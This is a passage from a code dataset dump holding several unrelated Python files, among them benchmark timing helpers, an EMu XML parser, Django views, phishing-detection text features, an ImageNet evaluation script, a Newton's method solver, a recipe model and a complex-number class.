problem_tag: str = ''):\r\n self.algorithm_tag: str = algorithm_tag\r\n self.problem_tag: str = problem_tag\r\n self.processing_time: float = 0\r\n\r\n @contextmanager\r\n def run(self, pb: Problem) -> 'Benchmark':\r\n self.problem_tag = pb.name\r\n\r\n print(f\"{self.algorithm_tag}-{self.problem_tag}: start ...\")\r\n 
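# processing_time is reset here; the with-timeit() block below measures the\r\n # yielded section and its wall-clock time is added back after the yield, so\r\n # preprocess() can still fold an earlier stage's time on top afterwards.\r\n 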
self.processing_time = 0\r\n\r\n with timeit() as watch:\r\n yield self\r\n\r\n self.processing_time += watch.time\r\n print(f\"{self.algorithm_tag}-{self.problem_tag}: complete.\")\r\n\r\n self.report()\r\n\r\n def preprocess(self, preprocess: 'Benchmark') -> 'Benchmark':\r\n self.processing_time += preprocess.processing_time\r\n return self\r\n\r\n def report(self) -> 'Benchmark':\r\n print(f'{self.algorithm_tag}-{self.problem_tag}: processing time={self.processing_time}')\r\n return self\r\n\r\n def save(self) -> 'Benchmark':\r\n return save_object(f'benchmark/{self.algorithm_tag}/{self.algorithm_tag}-{self.problem_tag}.bin', self)\r\n\r\n @classmethod\r\n def load(cls, algorithm_tag: str, problem_tag: str) -> 'Benchmark':\r\n return load_object(f'benchmark/{algorithm_tag}/{algorithm_tag}-{problem_tag}.bin')\r\n\r\n\r\ndef run_in_parallel(script_file_path: str, test_function: Callable, use_pypy: bool = False):\r\n if len(sys.argv) == 2:\r\n block_count = int(sys.argv[1])\r\n block_size = ceil(50 / block_count)\r\n for proc in [Popen(f\"{PYPY_PATH if use_pypy else PYTHON_PATH} {os.path.basename(script_file_path)} {i * block_size + 1} {block_size}\", shell=True) for i in range(block_count)]:\r\n proc.wait()\r\n print('complete')\r\n elif len(sys.argv) == 3:\r\n print(\"start -- block=\" + sys.argv[1])\r\n test_function(int(sys.argv[1]), min(int(sys.argv[2]), 51 - int(sys.argv[1])))\r\n print(\"complete -- block=\" + sys.argv[1])\r\n else:\r\n print(\"ERROR: arguments count must be 2 or 3.\")\r\n\r\n\r\ndef load_performance_set(algorithm_name: str, problem_class: str):\r\n performance_set = []\r\n for index in range(0, 50):\r\n bench = Benchmark.load(algorithm_tag=algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n performance_set.append((\r\n bench.processing_time,\r\n getattr(bench, 'select_count', 0),\r\n getattr(bench, 'update_count', 0),\r\n getattr(bench, 'children_count', 0),\r\n getattr(bench, 'avg_queue_len', 0),\r\n getattr(bench, 'max_queue_len', 0)))\r\n return performance_set\r\n\r\ndef check_processing_times(algorithm_name: str, problem_class: str):\r\n processing_times = [p[0] for p in load_performance_set(algorithm_name, problem_class)]\r\n return mean(processing_times), stdev(processing_times), max(processing_times), min(processing_times)\r\n\r\n\r\ndef compare_processing_times(improved_algorithm_name: str, base_algorithm_name: str, problem_class: str):\r\n improvements = []\r\n improved_count = 0\r\n for index in range(0, 50):\r\n improved_result = Benchmark.load(algorithm_tag=improved_algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n base_result = Benchmark.load(algorithm_tag=base_algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n improvements.append(base_result.processing_time / improved_result.processing_time)\r\n improved_count += 1 if improved_result.processing_time < base_result.processing_time else 0\r\n return mean(improvements), stdev(improvements), max(improvements), min(improvements), improved_count, improved_count / len(improvements)\r\n\r\n\r\n","repo_name":"kengo-zenitani/2021-reachability-graph-analysis","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30560035792","text":"from decimal import Decimal\n\nyour_text = input('Type any text:\\n')\n\ndef counting_stars (your_text):\n l = 0\n u = 0\n for i in your_text:\n if i in ['.', ',' ,':' ,';' ,'!', '?', '(', 
')', '[', ']', '{', '}', '-', '\"', \"'\", ' ', '@', '#', '$', '%', '^', '&', '*', '№', '~', '`', '-', '_', '+', '=', '<', '>', '|', '\\n', '/']:\n continue\n elif i.islower():\n l += 1\n elif i.isupper():\n u += 1\n s = l + u\n \n x = Decimal((l/s)*100)\n l_percentage = round(x,2)\n\n y = Decimal((u/s)*100)\n u_percentage = round(y,2)\n\n print(f'In the text {u_percentage} % of letters are in upper case and {l_percentage} % of letters are in lower case.')\n\ncounting_stars (your_text)\n","repo_name":"Argen-Aman/chapter3task5","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29219272540","text":"from lxml import etree\nimport sys\nfrom pprint import pprint\nfrom collections.abc import MutableMapping\nimport csv\n\nclass record(dict):\n def __repr__(self):\n return super(record, self).__repr__()\n\n @classmethod\n def parse_tuple(cls, tuple_elem):\n \"Parse out a record within an EMu xml report to JSON\"\n new_rec = cls()\n new_rec.xml = tuple_elem\n for elem in tuple_elem:\n if elem.tag == 'atom':\n new_rec[elem.attrib['name']] = elem.text\n elif elem.tag == 'tuple':\n new_rec[elem.attrib['name']] = cls.parse_tuple(elem)\n elif elem.tag == 'table':\n new_rec[elem.attrib['name']] = []\n for record in elem.iterfind('tuple'):\n new_rec[elem.attrib['name']].append(cls.parse_tuple(record))\n return new_rec\n\n @classmethod\n def parse_xml(cls, xml_doc):\n \"iterator to generate JSON EMu records from xml\"\n with open(xml_doc, encoding='utf-8') as f:\n text = f.read()\n for x in range(8):\n text = text.replace(chr(x), ' ')\n text = text.replace(chr(19), '')\n text = text.replace(chr(20), '')\n text = text.replace(chr(24), '')\n text = text.replace(chr(25), '')\n text = text.replace(chr(28), '')\n text = text.replace(chr(29), '')\n text = text.replace('\\u2014', '-')\n text = text.replace('\\u2013', '-')\n text = text.replace('encoding=\"UTF-8\"', '')\n tree = etree.fromstring(text)\n for elem in tree.iterfind('tuple'):\n yield cls.parse_tuple(elem)\n\n def merge_field(self, **kwargs):\n \"\"\"merge a given field based on kwargs - table fields are appended as\n new levels, text fields are added as new lines\"\"\"\n for key, val in kwargs.items():\n if key.endswith('_tab'):\n if self.get(key) is not None:\n self[key].append(val)\n else:\n self[key] = [val]\n else:\n self[key] += '\\n' + val\n\n def migrate_field(self, source, dest):\n \"Migrate a field to another field, blanking the source field\"\n val = self[source]\n if dest.endswith('_tab'):\n self[dest] = [val]\n else:\n self[dest] = val\n self[source] = None\n\n def to_xml(self):\n \"Export a record as EMu xml\"\n root_element = etree.Element('tuple')\n for key, value in self.items():\n if type(value) == str:\n etree.SubElement(root_element, 'atom', name=key).text = value\n elif type(value) == list:\n tab_element = etree.SubElement(root_element, 'table', name=key)\n for val in value:\n if hasattr(val, 'to_xml'):\n tab_element.append(val.to_xml())\n else:\n tup_element = etree.SubElement(tab_element, 'tuple')\n field, _ = key.split('_')\n etree.SubElement(tup_element, 'atom', name=field).text = val\n elif hasattr(value, 'to_xml'):\n tup_element = value.to_xml()\n tup_element.attrib['name'] = key\n root_element.append(tup_element)\n return root_element\n\n def flatten(self, parent_key='', sep='.'):\n \"Flatten the record JSON structure to a format suitable for CSV output\"\n items = []\n for k, v in 
self.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, MutableMapping):\n items.extend(v.flatten(new_key, sep=sep).items())\n elif isinstance(v, list):\n for x in v:\n items.extend(x.flatten(new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n row = {}\n for field, value in items:\n if value is None:\n value = ''\n if not row.get(field):\n row[field] = value\n else:\n row[field] += '|' + value\n return row\n \n def findall(self, fieldname):\n \"return all text values for a given fielldname, including in nested records\"\n xpath = f\".//atom[@name='{fieldname}']\"\n for x in self.xml.findall(xpath):\n if x.text is not None:\n yield x.text\n \n def find(self, fieldname):\n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//atom[@name='{fieldname}']\"\n x = self.xml.find(xpath)\n if x is not None:\n return x.text\n\n def find_in_table(self, table_name, fieldnames):\n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//table[@name='{table_name}']/tuple\"\n for x in self.xml.findall(xpath):\n data = {}\n for f in fieldnames:\n xpath = f\"atom[@name='{f}']\"\n e = x.find(xpath)\n if e is not None:\n data[f] = e.text\n else:\n data[f] = None\n yield data\n\n\n def find_in_tuple(self, tuple_name, fieldnames): \n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//tuple[@name='{tuple_name}']\"\n for x in self.xml.findall(xpath):\n data = {}\n for f in fieldnames:\n xpath = f\"atom[@name='{f}']\"\n e = x.find(xpath)\n if e is not None:\n data[f] = e.text\n else:\n data[f] = None\n yield data\n\n def print_xml(self):\n return etree.tostring(self.to_xml(), pretty_print=True).decode()\n\n @staticmethod\n def serialise_to_xml(table, records, out_file):\n table_elem = etree.Element('table', name=table)\n for rec in records:\n table_elem.append(rec.to_xml())\n tree = etree.ElementTree(table_elem)\n tree.write(\n str(out_file), pretty_print=True, standalone=True, xml_declaration=True,\n encoding='UTF-8')\n\n @classmethod\n def serialise_to_csv(cls, in_file, out_file):\n fieldnames = set()\n rows = []\n for r in cls.parse_xml(in_file):\n row = r.flatten()\n fieldnames.update(row.keys())\n rows.append(row)\n fieldnames = list(fieldnames)\n fieldnames.sort()\n with open(out_file, 'w', encoding='utf-8-sig', newline='') as f:\n writer= csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(rows)\n\nif __name__ == '__main__':\n record.serialise_to_csv(sys.argv[1], sys.argv[2])\n","repo_name":"lglanville/rms","sub_path":"emu_xml_parser.py","file_name":"emu_xml_parser.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18240626821","text":"from django.shortcuts import render\nfrom django.http.response import JsonResponse, HttpResponse, FileResponse\nfrom django.views import View\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nimport json\nfrom .models import Category, SpecialistModel\nfrom django.db.models import Q\nimport random\nfrom .resources import SpecialistResource\nfrom datetime import datetime\nimport xlrd\nfrom django.forms.models import model_to_dict\nfrom .admin import refreshAge\n\n\n# Create your views here.\n\n\nclass RandomSelectView(View):\n def get(self, requests):\n cq = Category.objects.all()\n 
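# Flatten each Category row into a single display string (code, space,\n # name); the POST handler below splits on the first space to recover the code.\n 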
categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n\n dic = json.dumps({\"categories\": categories})\n return render(requests, \"admin/randomselect.html\", {\"dic\": dic})\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n querysetAll = SpecialistModel.objects.only('id')\n querysetIdList = []\n for q in querysetAll:\n querysetIdList.append(q.id)\n forms = data['data']\n slice = []\n results = []\n for form in forms:\n queryset = SpecialistModel.objects.filter(id__in=querysetIdList)\n realSize = form['size'] * 3\n category = form['selectedValue'].split(\" \")[0]\n company = form['company']\n current_query = queryset.filter(Q(spe_ctg1__ctg_code=category) | Q(spe_ctg2__ctg_code=category) | Q(\n spe_major__ctg_code=category)).exclude(\n spe_company=company)\n current_query = current_query.distinct()\n formResult = []\n deleteID = []\n if realSize < current_query.count():\n randList = random.sample(range(current_query.count()), realSize)\n else:\n randList = range(current_query.count())\n for i in randList:\n deleteID.append(current_query[i].id)\n dict = model_to_dict(current_query[i])\n major = Category.objects.get(id=dict['spe_major'])\n ctg1 = Category.objects.get(id=dict['spe_ctg1'])\n ctg2 = Category.objects.get(id=dict['spe_ctg2'])\n dict['spe_major'] = model_to_dict(major)\n dict['spe_ctg1'] = model_to_dict(ctg1)\n dict['spe_ctg2'] = model_to_dict(ctg2)\n dict['spe_birth'] = dict['spe_birth'].strftime(\"%Y-%m-%d\")\n formResult.append(dict)\n querysetIdList.remove(current_query[i].id)\n results.append(formResult)\n # print(results)\n return JsonResponse(results, safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\n\nclass PrintView(View):\n CONTENT_TYPE = 'application/octet-stream'\n def get_export_filename(self):\n date_str = datetime.now().strftime('%Y-%m-%d')\n filename = \"%s-%s.%s\" % (\"list\",\n date_str,\n 'xls')\n return filename\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n pks = data['pks']\n # The __in lookup filter expresses set membership\n qs = SpecialistModel.objects.filter(id__in=pks)\n dataset = SpecialistResource().export(queryset=qs)\n res = HttpResponse(\n dataset.xls, content_type=\"application/vnd.ms-excel\"\n )\n res['Content-Disposition'] = 'attachment; filename=\"test.xls\"'\n return res\n except Exception as e:\n return HttpResponse(e)\n\n\nclass UploadView(View):\n\n @method_decorator(csrf_exempt) # In class-based views, CSRF-token decorators can only be applied to dispatch\n def dispatch(self, request, *args, **kwargs):\n return super(UploadView, self).dispatch(request, *args, **kwargs)\n\n def get(self, requests):\n cq = Category.objects.all()\n categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n\n dic = json.dumps({\"categories\": categories})\n return render(requests, \"admin/importfromxls.html\", {\"dic\": dic})\n\n def post(self, requests):\n try:\n file = requests.FILES.get(\"file\", None)\n category = requests.POST.get(\"selectedValue\").split(\" \")[1]\n company = requests.POST.get(\"company\")\n queryset = SpecialistModel.objects.filter(\n Q(spe_ctg1__ctg_name=category) | Q(spe_ctg2__ctg_name=category)\n ).exclude(spe_company=company)\n xlsdata = xlrd.open_workbook(file_contents=file.read())\n table = xlsdata.sheet_by_index(0)\n temp = table.col_slice(colx=1, start_rowx=1)\n randomList = []\n for row in temp:\n randomList.append(int(row.value))\n size = len(randomList)\n qs = queryset.filter(spe_code__in=randomList)\n qs.distinct()\n realSize = len(qs)\n if realSize < size:\n benchqs = 
queryset.exclude(spe_code__in=randomList)[0:size - realSize]\n qs = qs | benchqs\n data = eval(serializers.serialize(\"json\", qs, use_natural_foreign_keys=True))\n return JsonResponse(data, safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\ndef statisticAgeSpan(queryset):\n ageSpan = {\n \"<21\": 0,\n \"21-30\": 0,\n \"31-40\": 0,\n \"41-50\": 0,\n \"51-60\": 0,\n \">60\": 0,\n }\n result = []\n for q in queryset:\n age = int(q.spe_age)\n if age in range(1, 20):\n ageSpan[\"<21\"] += 1\n elif age in range(21, 30):\n ageSpan[\"21-30\"] += 1\n elif age in range(31, 40):\n ageSpan[\"31-40\"] += 1\n elif age in range(41, 50):\n ageSpan[\"41-50\"] += 1\n elif age in range(51, 60):\n ageSpan[\"51-60\"] += 1\n elif age in range(61,100):\n ageSpan[\">60\"] += 1\n for key in ageSpan:\n result.append({\n \"name\": key,\n \"value\": ageSpan[key]\n })\n return result\n\n\nclass StatisticView(View):\n\n def get(self, requests):\n cq = Category.objects.all()\n categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n ageSpan = statisticAgeSpan(SpecialistModel.objects.all())\n\n dic = json.dumps({\"categories\": categories, \"ageSpan\": ageSpan})\n return render(requests, \"admin/statistic.html\", {\"dic\": dic})\n\n\nclass StatisticCategoryView(View):\n def get(self, requests, category):\n try:\n categories = category.split('-')\n\n major = categories[0]\n ctg1 = categories[1]\n ctg2 = categories[2]\n if major:\n major = major.split(' ')[0]\n if ctg1:\n ctg1 = ctg1.split(' ')[0]\n if ctg2:\n ctg2 = ctg2.split(' ')[0]\n print(ctg1)\n qs = SpecialistModel.objects.filter(\n Q(spe_major__ctg_code=major) | Q(spe_ctg1__ctg_code=ctg1) | Q(spe_ctg2__ctg_code=ctg2))\n print(qs)\n return JsonResponse(json.dumps(statisticAgeSpan(qs)), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\nclass CheckView(View):\n def get(self, requests):\n try:\n retired = []\n qs = SpecialistModel.objects.filter(spe_age__gte=60)\n for q in qs:\n retired.append({\n \"name\": q.spe_name,\n \"id\": q.id,\n })\n return JsonResponse(json.dumps(retired), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n pks = data['data']\n qs = SpecialistModel.objects.filter(id__in=pks).delete()\n return JsonResponse(json.dumps({\"\": \"\"}), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\nclass refreshAgeView(View):\n def get(self, requests):\n try:\n refreshAge()\n return JsonResponse(json.dumps({\"\": \"\"}), safe=False)\n except Exception as e:\n return HttpResponse(e)\n","repo_name":"Mid0Riii/specialistProject","sub_path":"specialistApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29674646671","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom concurrent.futures import ThreadPoolExecutor\nimport pickle\nimport pandas as pd\n\n# function to cache downloaded web pages\ndef cache_web_page(url, cache_dir='cache'):\n os.makedirs(cache_dir, exist_ok=True)\n cache_file = os.path.join(cache_dir, f\"{hash(url)}.pickle\")\n\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as f:\n return pickle.load(f)\n else:\n try:\n response = requests.get(url, timeout=10)\n with open(cache_file, 'wb') as f:\n pickle.dump(response, f)\n except 
requests.exceptions.RequestException:\n response = None\n\n return response\n\n\ndef extract_title_and_meta_description(url):\n try:\n response = cache_web_page(url)\n if response is None or not response.content:\n return '', ''\n\n decoded_content = response.content.decode(errors='replace')\n if not decoded_content.strip().startswith('<'):\n return '', ''\n\n soup = BeautifulSoup(decoded_content, 'lxml')\n title = soup.title.string.strip() if soup.title else ''\n meta_description = ''\n for tag in soup.find_all('meta'):\n if 'name' in tag.attrs and tag.attrs['name'].lower() == 'description':\n meta_description = tag.attrs['content']\n break\n return title, meta_description\n except:\n return '', ''\n\n\n# Add batch_size parameter to the parallel extraction function\ndef extract_titles_and_meta_descriptions_parallel(urls, max_workers=10, batch_size=1000):\n results = []\n for i in range(0, len(urls), batch_size):\n batch_urls = urls[i:i + batch_size]\n print(f\"Processing batch {i // batch_size + 1} of {len(urls) // batch_size + 1}\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n batch_results = list(executor.map(extract_title_and_meta_description, batch_urls))\n results.extend(batch_results)\n return results\n\ndef extract_nlp_features(urls, max_features=100, max_workers=10, batch_size=1000):\n print(\"Extracting titles and meta descriptions...\")\n titles_and_meta_descriptions = extract_titles_and_meta_descriptions_parallel(urls, max_workers=max_workers, batch_size=batch_size)\n\n print(\"Combining texts...\")\n combined_texts = [\n f\"{title} {meta_description}\"\n for title, meta_description in titles_and_meta_descriptions\n ]\n\n print(\"Vectorizing texts...\")\n vectorizer = TfidfVectorizer(max_features=max_features)\n nlp_features = vectorizer.fit_transform(combined_texts)\n\n # Convert the csr_matrix to a DataFrame\n print(\"Converting to DataFrame...\")\n nlp_features_df = pd.DataFrame(nlp_features.toarray(), columns=vectorizer.get_feature_names_out())\n\n return nlp_features_df","repo_name":"maheenfs/Phishing-Detection-Using-NLP-and-Graph-Features-Extraction","sub_path":"nlp_features.py","file_name":"nlp_features.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22174649510","text":"import os\nos.environ['XLA_PYTHON_CLIENT_PREALLOCATE'] ='false'\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nimport tensorflow_datasets as tfds\nfrom tqdm import tqdm\nimport pickle\n\ndataset_builder = tfds.builder('imagenet2012')\ndataset_builder.download_and_prepare(download_config=tfds.download.DownloadConfig(\n manual_dir='/user/home/qe22442/work/ImageNet'))\n\n\nfrom input_pipeline import preprocess_for_eval, create_split\n\nds = create_split(dataset_builder, 1000, True)\nimg = next(iter(tfds.as_numpy(ds)))['image'][:20]\n\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\nfrom PIL import Image\n\nimport haikumodels as hm\n\nrng = jax.random.PRNGKey(42)\n\ndef _model(images, is_training, sm_mode):\n net = hm.SmResNet50()\n return net(images, is_training, sm_mode)\n\nmodel = hk.transform_with_state(_model)\nparams, state = model.init(rng, img, is_training=True, sm_mode=None)\n\ncorrect = 0\ntotal = 0\nfor t in tqdm(tfds.as_numpy(ds)):\n X = t['image']\n y = t['label']\n X = hm.resnet.preprocess_input(X)\n # print(X.shape)\n preds, state = model.apply(params, state, None, X, is_training=True, sm_mode='acc')\n total += len(X)\n correct += (preds.argmax(-1) 
== y).sum()\n\nwith open(os.path.join('./cov_cache', f\"bn_sm.pkl\"), \"wb\") as f:\n pickle.dump(state, f)\n\nprint(total)\nprint(correct / total)\n","repo_name":"xidulu/ShiftMatchImageNet","sub_path":"cov_train_generator.py","file_name":"cov_train_generator.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73925260520","text":"import numpy as np\nimport sympy as sp\n\n# Define x and y as mathematical symbols\nvars = sp.symbols('x y')\nx, y = vars\n\n# Define the functions \nf = ([x*y - y**3 - 1, x**2 * y + y - 5])\n\n# Initialise Jacobian matrix\nJ = sp.zeros(len(f),len(vars))\n\n# Fill Jacobian matrix with entries\nfor i, fi in enumerate(f):\n for j, symbol in enumerate(vars):\n J[i,j] = sp.diff(fi, symbol)\n\nprint(J)\n# Find the inverse of Jacobian Matrix\nJ_inv = sp.Matrix.inv(J)\n\nprint(J_inv)\n# Initialize solution s with starting values x_0 = 0.0 and y_0 = 5.0\ns = sp.Matrix([\n 0.0,\n 5.0\n])\n\ni = 0\nwhile i<10:\n\n # Update f(s_k) using newer values of s_k\n f_sk = sp.Matrix([f[0].subs({x:s[0],y:s[1]}),f[1].subs({x:s[0],y:s[1]})])\n\n\n # Calculate value of inverse jacobian, j^-1(sk), j_val\n j_val = J_inv.subs({x:s[0],y:s[1]})\n\n print(s) \n \n # Calculate the new value of s using iterative formula\n s = s-j_val*f_sk;\n\n \n i += 1\n\nprint()","repo_name":"Arc-tic-Wolf/Numerical-Scripts","sub_path":"jacob.py","file_name":"jacob.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8048579976","text":"from typing import Optional\nfrom uuid import UUID\n\nimport aiohttp\nimport sqlalchemy.sql as sa\nfrom sqlalchemy.engine import RowMapping\n\nfrom vocabulary.common import database, settings\nfrom vocabulary.common.log import logger\nfrom vocabulary.models import models\n\n\nasync def _get_json(url: str):\n async with aiohttp.ClientSession() as ses:\n async with ses.get(url) as resp:\n try:\n json = await resp.json()\n except Exception as e:\n logger.exception(e)\n return {}\n return json\n\n\nasync def get_linked_words(word: str) -> list[str]:\n word = word.lower().strip()\n url = settings.SYNONYMS_SEARCH_URL.format(word=word)\n\n resp = await _get_json(url)\n\n try:\n words = list(list(resp.values())[0].values())[0].keys()\n\n words = [\n i.replace('_X', ' sth/sb').replace('_', ' ')\n for i in words\n ]\n except Exception:\n return []\n else:\n return words\n\n\nasync def get_words_to_learn(*,\n limit: Optional[int] = None,\n offset: Optional[int] = None) -> list[RowMapping]:\n stmt = sa.select(models.WordToLearn)\\\n .order_by(models.WordToLearn.c.added_at)\\\n .limit(limit).offset(offset)\n\n async with database.session() as ses:\n return (await ses.execute(stmt)).mappings().all()\n\n\nasync def delete_word_to_learn(*,\n word_id: UUID) -> Optional[RowMapping]:\n stmt = sa.delete(models.WordToLearn)\\\n .returning(models.WordToLearn)\\\n .where(models.WordToLearn.c.word_id == str(word_id))\n\n async with database.session() as ses:\n return (await ses.execute(stmt)).mappings().one_or_none()\n\n\nasync def add_word_to_learn(*,\n word: str) -> None:\n stmt = models.WordToLearn.insert()\\\n .values(word=word)\n\n async with database.session() as ses:\n await 
ses.execute(stmt)\n","repo_name":"kunansy/Vocabulary","sub_path":"vocabulary/words/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2760123267","text":"#!/usr/bin/python3.6\n\nimport sys\nimport getopt\nimport json\n\nwsroot='${workspaceRoot}/'\n\ndef Usage():\n\tprint (\"\"\"\\\n-j filename\n\tproperty file\n-s filename\n\tfile with sources to add\n-i filename\n\tfile with includes to add\n-c\n\tclear the file before\n-e\n\texit after clear the file (use: '-e 1')\\\n\"\"\")\n\texit(0)\n\ndef writeConfig():\n\twith open(PROP_FILE, 'w') as f:\n\t\tjson.dump(prop, f, indent=4)\n\nif len(sys.argv) < 5:\n\tUsage()\n\nPROP_FILE = incFile = srcFile = \"\"\nclrflg = exitfl = 0\nopts, args = getopt.getopt(sys.argv[1:], 'hce:j:s:i:')\nfor opt, arg in opts:\n\tif opt == '-j':\n\t\tPROP_FILE = arg\n\telif opt == '-s':\n\t\tsrcFile = arg\n\telif opt == '-i':\n\t\tincFile = arg\n\telif opt == '-c':\n\t\tclrflg=1\n\telif opt == '-e':\n\t\texitfl=1\n\telse:\n\t\tUsage()\t\t\n\nprop = json.load( open(PROP_FILE) )\n\nincludes = prop[\"configurations\"][0][\"includePath\"]\nsources = prop[\"configurations\"][0][\"browse\"][\"path\"]\n\nif clrflg == 1:\n\tincludes.clear()\n\tsources.clear()\n\tif exitfl == 1:\n\t\twriteConfig()\n\t\texit(0)\n\nnew_sources = [ line.rstrip('\\n') for line in open(srcFile,'r') ]\nnew_includes = [ line.rstrip('\\n') for line in open(incFile,'r') ]\n\nfor ni in new_includes:\n\tni = wsroot + '*' if ni == '.' else wsroot + ni + '/*'\n\tif ni not in includes:\n\t\tincludes.append(ni)\n\nfor ns in new_sources:\n\tns = wsroot + '*' if ns == '.' else wsroot + ns + '/*'\n\tif ns not in sources:\n\t\tsources.append(ns)\n\nwriteConfig()\n\n","repo_name":"perminovr/make-prj","sub_path":"Build/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39517883818","text":"from google.appengine.ext import ndb\nfrom google.appengine.api import search\n\nclass Recipes(ndb.Model):\n user = ndb.KeyProperty(kind='Users')\n parsed = ndb.BooleanProperty(required=True)\n source_url = ndb.StringProperty()\n title = ndb.StringProperty(required=True)\n cuisine = ndb.StringProperty()\n difficulty = ndb.StringProperty(choices =['Easy', 'Medium', 'Hard'])\n prep_time = ndb.IntegerProperty(default=0)\n cook_time = ndb.IntegerProperty(default=0)\n ingredients = ndb.JsonProperty()\n directions = ndb.TextProperty(repeated=True)\n photo_key = ndb.BlobKeyProperty()\n photo_url = ndb.StringProperty()\n\n @classmethod\n def parse_ingredients(cls, string_of_ingredients):\n list_ingredients = string_of_ingredients.split('\\n')\n json_ingredients = []\n\n for row in list_ingredients:\n amount, unit, ingredient = row.split(' ')\n json_ingredients.append({\n 'amount': amount,\n 'unit': unit,\n 'ingredient': ingredient\n })\n return json_ingredients\n @classmethod\n def parse_directions(cls, string_of_directions):\n list_directions = string_of_directions.split('\\n')\n return list_directions\n\n @classmethod\n def add_new_recipe(cls, title, cuisine, difficulty, prep_time, cook_time, ingredients, directions, photo_key, photo_url, user_key=None, source_url=None):\n\n json_ingredients = cls.parse_ingredients(ingredients)\n list_directions = cls.parse_directions(directions)\n parsed = True\n user_id = ''\n\n if user_key:\n parsed = False\n user_id = 
str(user_key.id())\n recipe_key = cls(\n user=user_key,\n parsed=parsed,\n source_url=source_url,\n title=title,\n cuisine=cuisine,\n difficulty=difficulty,\n prep_time=int(prep_time),\n cook_time=int(cook_time),\n ingredients=json_ingredients,\n directions=list_directions,\n photo_key=photo_key,\n photo_url=photo_url\n ).put()\n\n index = search.Index('recipes')\n doc = search.Document(\n doc_id=str(recipe_key.id()),\n fields=[\n search.TextField(name='user_id', value=user_id),\n search.AtomField(name='parsed', value='1' if parsed else '0'),\n search.TextField(name='title', value=title),\n search.TextField(name='cuisine', value=cuisine),\n search.TextField(name='difficulty', value=difficulty),\n search.NumberField(name='prep_time', value=int(prep_time)),\n search.NumberField(name='cook_time', value=int(cook_time)),\n search.TextField(name='ingredients', value=ingredients),\n search.TextField(name='directions', value=directions),\n search.TextField(name='photo_url', value=photo_url),\n ]\n )\n index.put(doc)\n\n @classmethod\n def get_all_recipes_by_user(cls, user_id):\n index = search.Index('recipes')\n query = 'user_id:(%s)' % (user_id)\n results = index.search(query)\n\n return results.results\n\n\n\n\n\n\n","repo_name":"toddka/Recipe-Search-Website","sub_path":"models/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11476933769","text":"class Complex:\n '''\n >>> a=Complex(5,-6)\n >>> b=Complex(2,14)\n >>> a*b\n 94 + 58i\n >>> b*5\n 10 + 70i\n >>> 5*b\n 10 + 70i\n >>> isinstance(5*b, Complex)\n True\n >>> a.conjugate()\n 5 + 6i\n >>> b.conjugate()\n 2 - 14i\n '''\n def __init__(self,r,i):\n self._real = r\n self._imag = i\n def __str__(self):\n \"\"\"Display complex number\"\"\"\n if self._imag>=0:\n return f\"{self._real} + {self._imag}i\"\n else:\n return f\"{self._real} - {abs(self._imag)}i\"\n\n __repr__ = __str__\n def conjugate(self):\n return Complex(self._real,-self._imag)\n def __mul__(self,other):\n if(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n else:\n real = other * self._real\n imag = other * self._imag\n return Complex(real,imag)\n def __rmul__(self,other):\n \"\"\"Multiply a real and Complex number\"\"\"\n if(isinstance(self,Complex)):\n real = other * self._real\n imag = other * self._imag\n elif(isinstance(other,Complex)):\n real = self * other._real\n imag = self * 